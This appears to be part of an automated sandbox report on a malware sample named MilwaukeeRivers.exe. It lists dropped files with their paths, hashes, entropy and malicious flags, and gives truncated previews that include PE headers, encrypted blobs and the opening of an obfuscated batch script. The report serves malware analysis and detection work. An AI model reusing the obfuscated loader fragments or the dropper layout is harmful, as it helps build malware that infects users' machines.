                              SHA1:AD839FFE077B94D8AA26523557826B66268DB8AD
                              SHA-256:7C047D4BD015BF4DB77FA60EDADD2CD71A0969C8B6BA68C7A1799B63AB3A4ED3
                              SHA-512:5342208EF56103E9329F877AEC12FC3E85DCA2E1363F21960C8293841F0093463A16298CCB8BE6D418835FEBFB3E3E10CEE5336BA342A5D170942186974590A3
                              Malicious:false
                              Reputation:unknown
                              Preview:GeologicalAllowStoryVirtually..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):78848
                              Entropy (8bit):7.9977852984731435
                              Encrypted:true
                              SSDEEP:
                              MD5:A2E6F3D6B4B15803FC39DB66D53D5A68
                              SHA1:4D9E598B94C8A1C3F88A7D70C72C726B306B7DA1
                              SHA-256:FC1405B7240E36717D575F651D792DB859226FF4EA8EA80773BF7200B6A582B8
                              SHA-512:56254F9A620FB0E38E8252A8CC1DD7D0E599D9C4854FFB8CA69771EF9FB0B3DEB6508492D4D2095AB8B7E1BBC0F381DD9FE743D1161CA344F4445D1C5E1B811C
                              Malicious:false
                              Reputation:unknown
                              Preview:Q ....n..;k..O..I.hN47.3`...H2R...3.VC.,.~.=g.......j..^.r.....D.KT....m....A.hY3...9~}{.`..@./<..&x............W....J_..9r....E..-..I..h.H....|&;.e.......5F..{...]`j@A..8.*......-.%.PP.....+.qG...d?.5......../S.i.`c.j._...J.p.2.wG.i>...s.k-..3..3N)Y2.W.9.....;...LA(X.-..m......K..T...m.l.k..v..[..."$..>..]. X..rv;zUn....?..%....[...t.Jt%....d.w.$&...#x.g\1.#.9.*.}s.VX...k..[;I./(m...$9..h.....#..d.,Z...u).r...."..7.+./e|.c............BP..k...!~.K.H..lh` .-.......i.]L.<..H]....)qA.R..<.Q....h.N....5.`f..|...x.-...J0...,...-O=.6....6s..r.h.Agy].kS2....&.AP.N.c...6.w....N.{..#..".).i.......Z.R..'.Hz.UA..NN.^|.d..q."??Lo...........O.&x......@JR.t[jX....YIL.....rPsD.{~.s1.&$.o.-..~..i0{p.Q..zY..V.......1..<0g..~.I......=j....7...Pg..... .ywo...g..cI...WG..,t...\...{....K..p....8.Fb9.e..c....*......_..9...S.w.{.-i..[....E.........(.f..,;V...#f.....*<TB..:......E.t:.F1._....<.p8GM..A.vW.Q......l.Q3..-.....X..z..o*..j...Wk'..ee...L.}=...y
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:data
                              Category:dropped
                              Size (bytes):5997423
                              Entropy (8bit):6.287585437318969
                              Encrypted:false
                              SSDEEP:
                              MD5:D4415DE41B124DCA4E6221F3C72D326E
                              SHA1:9A1948836322ED714D46EEF7D7660A7FE1B3384F
                              SHA-256:604673E6EDB9EDFC4B68DD8DF2CD825AAFAC39093F145AB080A0810E4D580FAA
                              SHA-512:F8F2307187A23126903C052956E5BD82EB70F759F5C0B1E5C1CB7101A0D6686FEBE4D28B1566BDD482411493617FC01FC02188CFC2B3F559E60C6124D77311F8
                              Malicious:false
                              Reputation:unknown
                              Preview:]$t...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................]$t.....................................
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):943784
                              Entropy (8bit):6.621472142472864
                              Encrypted:false
                              SSDEEP:
                              MD5:3F58A517F1F4796225137E7659AD2ADB
                              SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                              SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                              SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):78848
                              Entropy (8bit):7.997868077838998
                              Encrypted:true
                              SSDEEP:
                              MD5:2F47E917AB451B39DEE57628583E0E49
                              SHA1:9A5323F7F24A7D98ACB6AD484F39AE2211297DC7
                              SHA-256:FE0DE264E44FE42611AD2FAAFA7A97D45C48DE38F251CBC446913611F170E3EB
                              SHA-512:71044CF3E0848E8D7BAC6666E452690EF2EE623F408477F815235D0F737B1EC200F44152BFD59616BCD8DB538765337C62019F3FF5A122C3FD6F6E8EFF16F0C1
                              Malicious:false
                              Reputation:unknown
                              Preview:!.\N*...z~..^.9.)"G...^.V.\.YUC8.Oe..#.a./W................^..3.....;..K..xS)......I\..qq.J>.C..4.&........uLYK..{...../....$.Z.T.A.....X...lRgQ...[......=*.a.$.q..!..k........68o.1..K.u...nT......JB"`E.rf...P.x.......;...?8....ec%.....4w..k...g>F:....'..K....6.|......$.3CG$..#..B.l.~..5.f/S..".P..o.?......A...5Hi.?..MH..4..7a./..ap4..k.......3....q.b~..EV.....n#.Pc..>-%l.."eA-.@.R..8.yB...:..P..nM,.B..........9...|..d..[3z0.^.0..M....uj1.....Xb`L7Np..gk.)V..w..m.a.~.nB!H..LW............d*..U..Ku3...`fi1..;.2..>@..I.n.=C.4.J/w...A.sA...o.....{j.VPY...w.H"..f{N&..K....A....(...w.j.L..\1.MC...Z..(".\..@.Ee"...t#..:h."t.....9..+.}f.3..Y.E....;/..M..E...:.7JPH..B...1/_....i....LY.].....m|j....b.;.q...Lp.V..Cx4..&(:..gv..{<.f....h....a..b.!^DY.bL......b.0'.R....R..Q....kk!.v...BU..K.jd..2.5u..8."....p.....<..l,. .......w...%...i.+.Y...{..H.t..</...V...%}.j..B...FL.9........0n.^$...$..-&:..>.nE$./p.....j].1.i3ubx......p....t*.H@.k.L3].
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:IRIS Showcase file - version 5
                              Category:dropped
                              Size (bytes):886815
                              Entropy (8bit):6.622132459564823
                              Encrypted:false
                              SSDEEP:
                              MD5:25C0CCA1B4B6C482FD0135E0E5E747A0
                              SHA1:339571736C2FC5CDE1AD6F9E7DC58EE62A863C63
                              SHA-256:1DE377CC55C433743B916DE2CFABDA2BA5E73FF825F3E7F968AD8905BDD8DFB4
                              SHA-512:A5B2ADE00F9F896578F97FECCD320675FA1C2824934549352EDC9BCB39CA411278EA8A91F0649C3A1AAE3C46EE6B6F9B25BB6E2D0AFAEE57DC35BF50843B2089
                              Malicious:false
                              Reputation:unknown
                              Preview:.......................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL..
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):14307528
                              Entropy (8bit):7.770087919251095
                              Encrypted:false
                              SSDEEP:
                              MD5:8FE60FF1954FF81AD6CAFF83914CF088
                              SHA1:B122B875DB7C48D00C719490A9183248CDDB90F8
                              SHA-256:F87EB3E54A164B62874F6D3F20EB1D1AB118FBEAB62F156066A7EDA88428DEB3
                              SHA-512:2061EA43CC34D280AE5E3E31DE9C43B408105930F9546360C6B93A32F13CA581A4BE518F60FEA79C73239F41793F0CED33972E37A30A6C53AA55300F9883CD53
                              Malicious:true
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.~.T.-.T.-.T.-.,J-.T.-."W-.T.-."c-hT.-5.Q-.T.-.T.-.T.-.T.-2W.-.,Z-.T.-."b-FU.-."S-.T.-."T-.T.-Rich.T.-........................PE..L...ir.b..................1..j,.....;.*...... 1...@...........................^.....T,....@..................................j<......0?.Lx..........`!..h/....Z.&....31.............................................. 1..............................text.../.1.......1................. ..`.rdata..t.... 1.......1.............@..@.data...\e....<..T....<.............@....rsrc...Lx...0?..z....>.............@..@.reloc........Z......zY.............@..B........................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
                              File Type:HTML document, ASCII text, with very long lines (8793), with no line terminators
                              Category:dropped
                              Size (bytes):8793
                              Entropy (8bit):6.1671840102708
                              Encrypted:false
                              SSDEEP:
                              MD5:31272E78B575FF9A69A13DEBFFFEF7EF
                              SHA1:2BC8B5201149B6A6A2A40D9C30283834989852C5
                              SHA-256:C80879950C53EC491785222A2FA5854422EB0EF41D33BC9E85F3053CFD2437E6
                              SHA-512:12348C454529101C3CB902A9C54753C5ABAF37B15DB14E4A8AA8AF1010F92CA420C3902E8A6F26B455457DA6694EAC6281A620DE2B4B14734AFD0759C855A0FC
                              Malicious:true
                              Reputation:unknown
                              Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:OpenPGP Public Key
                              Category:dropped
                              Size (bytes):61440
                              Entropy (8bit):7.997145288719872
                              Encrypted:true
                              SSDEEP:
                              MD5:8C746CED3CE86327E752383866D630D8
                              SHA1:3D6BEFC5AD1E28419AD7834DAE43A2B51DBB818A
                              SHA-256:E7DB8C4FDA3F419F74F3939AF4984A4FF079541B02843D6805B048D8BDFF0421
                              SHA-512:06B54B6279B80AAB06D1E47C221058CAE54FA5B9C875FC3C7F4D82F90DBC4ACCE9B246B678056C2A3D45493B82CEDDCD5E2420CA4014C15CD9093CEE2B0F27DB
                              Malicious:false
                              Reputation:unknown
                              Preview:..md6*...8YqTcJ./...n.....t...[yar.........45.yW#...-:Y....>. X.,Q..........Z.iI..W.#..$M4.L....nv-.......[..S.=;.....ug...Oz?.Aq.......FLb...N,!..==..{..W..=....[...k..>....py#...k~..........,...T...#7.....J.KB....d.....#C.v.v.P,a'w.J..HR.Cw.j.6.2>V<.q0.FT..L...L..z.ij2.=xp... ..{...AW ..........y..v........f.].M....Kb..Tb.K......u.SW ..D..D)...!..".H..$e......." .SL.nR..f.|,2u.jz....B.a.x.6..9.o....Y..B.0p=B.....+:3.v.Z.m.<....3..a.6|DK..1^?:|..w...3QL..4...;......pV.....+..q....y,.X\.....~k.&. .W.J..n._~......A.......ND.dO(g..B...<..&.G7...17.1..N.O..x.E.X..yF~.JH.0...G..E..'.<.*DH..4..%.*..1l...#..v#...c..fX.C.....qb{Va.Hz.....S...P.Y....z...m.Q...alF.^...s.....U.`.....a.9..T....w.Jq...:.S..VQn.x.2.)UP..O.e....G.=....J..>.......iB.>..B.Z......@....9..............=.F...{h...MI...Llw}..3R.X.|.L.J..h..I....T.^..rEF...'.@b.R.s.......y.....h....'&..ct.....t....B.P..v.F...G.4ig....H.@.?.r...zq...6T...~.....Vf...W..2X...&.P.x...kpl...._(..D...b...
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):90112
                              Entropy (8bit):7.998166501855411
                              Encrypted:true
                              SSDEEP:
                              MD5:54C81389F168A434CF19946888499A41
                              SHA1:3BCB690DA7B8809DDF88E833A47DACC04633BC80
                              SHA-256:C9766C34FF13CBB3B62AFBC794BC79171E1D573B5D4E2E3FF2C4B21885D537F6
                              SHA-512:61A2A3B2DCBCA67CA41E5BB96BBA3D31C4F17D491F6430F5B1584CA083310A4D4ADB612B5BAA6561B0AA5966BA062A0BA85A09E09065F0EC149EACD665328394
                              Malicious:false
                              Reputation:unknown
                              Preview:.M.......u.>.........B)k.....&T.`..np.......[..d.,. ..f..$N...M.]h1....#.9.`..V..q....&W...J....M.S....NB..TR..,.RIm.......m.nj.........~:.:_...lV..:.l....]>....{.P)...vF..E...z..Kv[..l...v.....[.'...9SX.,L......]...".-p.VE.ui..O...P.'I.4).y._..$..V....}$8..]..^...G.e.._.6.l/...H.7...t...C.T ...@...T..cjf...Q...."...>|....C.n.\.3.28.?...6!.HP.J@p.d!.};)AT..Z...JN......)...?.E..mr....)M.<..#......./.cN..X.....".z.......j.!.5..u[.6......k"g..-P...jx.=|s8...0.q.[.=.X..pn...5...H.1.M+.9...A.^.....)D$....\.(<...+\..Ji..V...I5...xW.{&O..67.'..x..fX. nVi...Y.`^.7......y....j_./.n.5.Qd.X>.j..:....}..5&[.%...M.S..'...F.4E-6.h..0...g...h[....f.$.S...8#..6;....R....bwk...$P..t..X..=.....-..+.Ho.J........)......crp.U@...IvHn.t.....!.o....W.C.S.....v ..l&JA......[...c......*T.3.'q2. /.C..#..I.=.hQ.............".G.7.....fQ.G..i.|..m.%.uXE..s...x.qy..4<.QiS..Ey.,.P.Y.Y...t.D.....:.^.v"0lU..|.y.....VA\.~F.1{C...)p<..z./n-.&.}7....Na7.*..
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:OpenPGP Public Key
                              Category:dropped
                              Size (bytes):92160
                              Entropy (8bit):7.998254921403739
                              Encrypted:true
                              SSDEEP:
                              MD5:3B05748621287F6259899970EF155A38
                              SHA1:DEF8ACF6355FBE03C1F369C86475A1880755FCB2
                              SHA-256:450619A5707D27235F489C4F5B6DBAA953405B7907DD23C03C6CCAC08E1187A1
                              SHA-512:787FCBAC6A9CEA27F2033BDCE73C0390D1C8C74D7FBD857FEC66EFB4D679A9981EC095D289801C92CAFC4D5CFB6747F6FCE87619D55C5ED10927D25731E9B0A4
                              Malicious:false
                              Reputation:unknown
                              Preview:.3d=..;.....#p.1Y...d....~V..\j..r=...m..^Oy*..x..Br.Q..........6.I..5.*R....'..].Z.M..8..J.....oC.G..53.Kn...HU.O.^f.z..Bj^5h$f..k._}f....]....X...y>..jV....A....0....|.M.c6..SA.....W...7>.e.(..+.....+|....Ho......8u.....MT.gR.H...P?..C.]..e..2h.....5.....K3~.Q.j.......~..)w.Q.."...|9.DL...(.mOB'.....{.. m.n...9.i.y'w..#3...+!I.].|.j.0.._.....l..g...........D..$.g:7MoM2f./.M.7~..z......_....../.JL.f..n..Z.*.......R.% QJ.[.i.gZI{A._....5..0.'.&rw..+.....J...}S.#..;jj\..s.......6../....5q......H."I..O...V.i...3.h.h../F...4.k..O..P...v...Kc.0....+c|..z...;...QXt...'x.H)..tR....^.,.....J.....C._e.w..R"M...nsd.Y....3...ij.I.`T.n..0n1u.$=o.9..t.W.@....].$....f..W.LF._..3#...0='...A.DVs...N........R............a..ns...7...#R..A....L.T.x...VE....?g.%{.&'..%.O1...'+.......Zv.?F|...A......MP`...Y._.b.wM.4.......Q>.^.C.o..@.....*....EP.q.p..o.78..m../.L.(...Y.|...{.&!....t...qKy.:...'........Z1..w.%n.....R.G4.H......t..v+..\..`..!>z......k.._m..$
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):88064
                              Entropy (8bit):7.9979669964896765
                              Encrypted:true
                              SSDEEP:
                              MD5:6517AA64B07030E6916DFAA84C900553
                              SHA1:40DE8C112F344C59E045E3BCD9D7F9F9CB427D7E
                              SHA-256:3BFC145B382F207A3ADED6E9AC0BC61F07C94C0B81658FD43CBB741A1AA7FEFE
                              SHA-512:AD71D36193B99219E36CDA11DC98BD4D44768C6EA0557F76C1902286942317A66CFAB6359D36A7439EC7E30CA85041941E55D5BB77ABBE9EB10183C7F7B8C7F6
                              Malicious:false
                              Reputation:unknown
                              Preview:..y...._.4..E..G=..>......2..,.}...8..0.AQu.|)fFHYv.^......h}...K......o...E..c.nt.E...8...f.c....Cmg.....m.l2}.y.~.d.I~OJ...9.{P..&+.N;..*2..Xg...K.y.{.....'.^..VW.r.B{...e...@O./FL..f.2.F.v.'.....vo...!d^Q*...d..Z8.|.^$4.&A>.?s.n.8&.n.F....}...d5X..U...Y..# =.$<w.~...<et.W..?.#.....'@^..#.Z.bAC...km.....G....E_...^.W[k_<B..;;u....ry.&7.m....#......Gk.._=Ub~.,.W{3.n'..b.w"..%c...<.rk.....?.n..J>.4^.O.=.j.Y.c..>.{..D#.v 7_v{....Yu.".`.w.C+..j.k\.x.d./^..3...67`.XJ...Zc3..I.......dz..v."...Sx...8 ....._:..U2...U...e...C....j......5.y....3bG.L#.#..M.hg.t..)..j..4.%k6.3...cE.T.^...)j...!..........'..WW./=C..!u..Qhfj.YW#.k..;.w&....v/....2`..;O.~Qq..P4."....S.l..;..9..[^./.}m.5..C/.1..'...........E..e.C.90&..Y.(y6..,,g..O.R;..nT]...>.?.....NK..`.....[...9.]+...`..y:..<.Zp...lso..z.....$j....^...1Q&.).......|.}.>1...~.J.^...&..B...Q....X$U9..)...?.:...c.7.....:....!.-*&...c..f.c.+.Jw;.....KQ3..3..m.......r.u1.1.~....[6}..Wo.V.&.%...X...AP..
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:ASCII text, with very long lines (1184), with CRLF line terminators
                              Category:dropped
                              Size (bytes):24072
                              Entropy (8bit):5.104729060087426
                              Encrypted:false
                              SSDEEP:
                              MD5:1E40CFD6DFE1B3C142469BEC11EB51F7
                              SHA1:0E13C823035CBEC02E0745E1970BFB7F3BDAA1BC
                              SHA-256:D720FF2AC7655230DC5CF3512402471CE822E7DEA81E3CD6121BA34F93081C1E
                              SHA-512:3BFAC352F9A61D151A2B217A893CA2E0C2819CF5E06A7C39D60F0FFF8481482BDE885596D4AAAACC0EBA97F5E8D030937315D1DF5EBC6768E0E7BDC8893837D4
                              Malicious:false
                              Reputation:unknown
                              Preview:Set Private=f..cHWorn-Cosmetic-Qualities-..FqOaWomens-Address-Scheduling-Analyze-Gi-Hypothetical-Certainly-Evaluated-..FwRhythm-Endif-Brands-Addressed-Stopped-Elvis-Filtering-..jEVSTranslate-Upload-Sequence-Accessories-Tie-Dead-Objective-..SOVNBuffer-Proc-Quit-Republic-View-Serial-Offered-Mails-Cylinder-..Set Shopper=B..JmwgGabriel-Ownership-Age-Rotary-Designs-..cUMpeg-..qhZKStarring-Editing-..TVNIndonesian-Phi-Skirt-Modification-Transmitted-Poem-..aNriBrooklyn-Collections-Emma-Of-..Set Scientific=e..MRZFinance-..YvwrWrapping-Xanax-Gamma-Estimated-Nuclear-Biology-Advert-..RVTFishing-Cast-Girl-Staff-Seo-Drivers-Meal-Repair-Ft-..oqSmith-..PvXQMortgages-Player-Sector-..Set Index=G..HJDemanding-Applicable-Hazards-..MfpDVideos-Remix-Visibility-Encourages-..aJpControversy-Questionnaire-Distances-Admin-Hundred-Probe-Worn-Indiana-America-..rJFinance-Programme-Near-Variable-Wr-Assumption-Adjusted-..URTNv-Taking-..WREPFalls-Identity-Web-Accent-..FLEaster-Doug-Volume-Karma-Pj-Completely-Guardian-
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:ASCII text, with very long lines (1184), with CRLF line terminators
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:1E40CFD6DFE1B3C142469BEC11EB51F7
                              SHA1:0E13C823035CBEC02E0745E1970BFB7F3BDAA1BC
                              SHA-256:D720FF2AC7655230DC5CF3512402471CE822E7DEA81E3CD6121BA34F93081C1E
                              SHA-512:3BFAC352F9A61D151A2B217A893CA2E0C2819CF5E06A7C39D60F0FFF8481482BDE885596D4AAAACC0EBA97F5E8D030937315D1DF5EBC6768E0E7BDC8893837D4
                              Malicious:false
                              Reputation:unknown
                              Preview:Set Private=f..cHWorn-Cosmetic-Qualities-..FqOaWomens-Address-Scheduling-Analyze-Gi-Hypothetical-Certainly-Evaluated-..FwRhythm-Endif-Brands-Addressed-Stopped-Elvis-Filtering-..jEVSTranslate-Upload-Sequence-Accessories-Tie-Dead-Objective-..SOVNBuffer-Proc-Quit-Republic-View-Serial-Offered-Mails-Cylinder-..Set Shopper=B..JmwgGabriel-Ownership-Age-Rotary-Designs-..cUMpeg-..qhZKStarring-Editing-..TVNIndonesian-Phi-Skirt-Modification-Transmitted-Poem-..aNriBrooklyn-Collections-Emma-Of-..Set Scientific=e..MRZFinance-..YvwrWrapping-Xanax-Gamma-Estimated-Nuclear-Biology-Advert-..RVTFishing-Cast-Girl-Staff-Seo-Drivers-Meal-Repair-Ft-..oqSmith-..PvXQMortgages-Player-Sector-..Set Index=G..HJDemanding-Applicable-Hazards-..MfpDVideos-Remix-Visibility-Encourages-..aJpControversy-Questionnaire-Distances-Admin-Hundred-Probe-Worn-Indiana-America-..rJFinance-Programme-Near-Variable-Wr-Assumption-Adjusted-..URTNv-Taking-..WREPFalls-Identity-Web-Accent-..FLEaster-Doug-Volume-Karma-Pj-Completely-Guardian-
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):20170
                              Entropy (8bit):7.992542334324972
                              Encrypted:true
                              SSDEEP:
                              MD5:93654B776416F68061F5812121D460E3
                              SHA1:917BE2E9A18B06F4B49C9F506FAA596D8DA4084E
                              SHA-256:6CFB0951411A034C4B06886A3D8BBBE1B58C988C8280183D0409B49AA4069D92
                              SHA-512:6F0DAE32FA26E7F02D1B781E7837D971B8E4FDAB7EF03DF2B1082CA9C7CC048DC23BBF092D827E2FC46B2FD293A26D1BDAEAFF34D5C62D4A20B44C2C17CD4570
                              Malicious:false
                              Reputation:unknown
                              Preview:.\w;..i..!...{..E.R.T.Y.].O..>I.CI:..-H{./........,TM.7Z...`..j.T .zq...e....t/)....f..9.J....dF...j..O"4..)j..TT=.....h.M^.Y.m.P3i..l L.X..g.r(.2,.....w...e..Q.?...j........Rb.........8=.....lu]..R.(..VE..........{..F?.V!..bs|.....97.....R.@......K...t...V.y.. ..I.g7Y.LC.n^.<....bx..I..B.Ib.P..i+H....r......(..%.(2^&g.e.*.M..)D...m.%@s.Y-b..]...w.m.|.9Vo.).9...kp....c.7........-..)..L..^...ke...k...nJ.txe.._f0..B.J.......1zSiD.F.._j... ....=|...j...~Ad.....h..P.|.&!...u.T\.1K.a......O.#.rt..+.+B...H..+.......X.y..<...#>_]..K.y..e..<.z..%rz.^..@\e.4..O.].L\".........................u...'HC.....s....esv1.n~......r[.&.j.6.'.5.pO.......7..5M...m..Q''.P.q.#...D.4&.....!k.....9.S...)....-....].,.0...<.<..IXd.(Ul.4-..A..T.VM.A...P.j...7.-...;..WdW...V.... .;.E......Z"......h....:...r.B....<4.....r....T.f..VL.K:.ww.4...a.E....y..'....E(.cP....l.~......p .j...}.V.......(..~...........7.g.7eq....t....&+.'...%..s.}.y....F..=....i..D...
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:unknown
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1276807
                              Entropy (8bit):7.678578723271913
                              Encrypted:false
                              SSDEEP:
                              MD5:F7C2901D99FEE2A139DAE790E876A6BE
                              SHA1:8DEA978EC46B449325F2B21F69579B197FEC74E7
                              SHA-256:F734B2177245A47BA77E17D5D42181D4F52AC7B643F315B87B1D19778B06CB16
                              SHA-512:3B10737E71E5158F17C82BE9E7215C8F1A31B16BB47518FBDF78DB87E5F8E28A89DBF45236A3B0D09ACFB70A94780874D74FF5E892956C039B261B3E40C96276
                              Malicious:false
                              Reputation:unknown
                              Preview:).P[).P[+.P[*.P[+.P[..P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.Q[....n......2I.?(E.$.}.>?E.#.y.1)^..>D...X.7)K.#.y.1)^. [*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[i..5C.9:F.*>o.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[i..)O.$>c.#/K.3>*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[....n..~v.98X.#4L.~.o...X.=>]."0*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[\.~k..`l..P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[*.P[
                              Process:C:\Windows\SysWOW64\more.com
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):544256
                              Entropy (8bit):6.517105923688266
                              Encrypted:false
                              SSDEEP:
                              MD5:3457FFDDBB4374C9013A430213FEE006
                              SHA1:78BAFB496BF44B291BF458714B75275F69316179
                              SHA-256:5444B66A973C31A73E4B86C3F8847C37ACE297496696A5201A84DD24130DB0C6
                              SHA-512:B7B81632C5FE659E56F5A98D7679441BB49F76C0676656F045F95DE02DCE0275AAF60D128219D36BD7D725A4AC1138D128D3BCFB945A44F2747724B84E3F1A02
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:unknown
